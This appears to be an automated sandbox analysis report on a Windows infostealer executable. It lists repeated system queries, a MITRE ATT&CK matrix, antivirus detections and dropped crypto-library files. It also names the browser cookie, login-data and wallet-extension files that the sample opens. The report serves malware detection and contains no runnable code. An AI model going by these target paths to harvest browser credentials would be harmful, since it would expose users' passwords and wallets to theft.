Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ecb.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ecb.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cbc.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cbc.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cfb.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cfb.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ofb.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ofb.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ctr.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ctr.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Util\_strxor.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Util\_strxor.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Code function: 0_2_00007FF7DA8F8900 cpuid

0_2_00007FF7DA8F8900

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Code function: 0_2_00007FF7DA8DB4E0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF7DA8DB4E0

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Code function: 0_2_00007FF7DA8F4D70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF7DA8F4D70

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	11 Process Injection	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Timestomp	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
4Vp6Xc8SFr.exe	46%	ReversingLabs	Win64.Trojan.Wasp
4Vp6Xc8SFr.exe	61%	Virustotal		Browse
4Vp6Xc8SFr.exe	100%	Avira	TR/PSW.Agent.ypbdq

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_ARC4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_Salsa20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_chacha20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_pkcs1_decode.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_aes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_aesni.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_arc2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_blowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cast.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cbc.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cfb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ctr.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_des.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_des3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ecb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_eksblowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ocb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ofb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_BLAKE2b.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_BLAKE2s.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_MD2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_MD4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_MD5.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_RIPEMD160.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA1.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA224.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA256.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA384.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_SHA512.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_ghash_clmul.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_ghash_portable.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_keccak.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_poly1305.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Math\_modexp.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Protocol\_scrypt.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_ec_ws.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_ed25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_ed448.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey\_x25519.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Util\_cpuid_c.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Util\_strxor.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
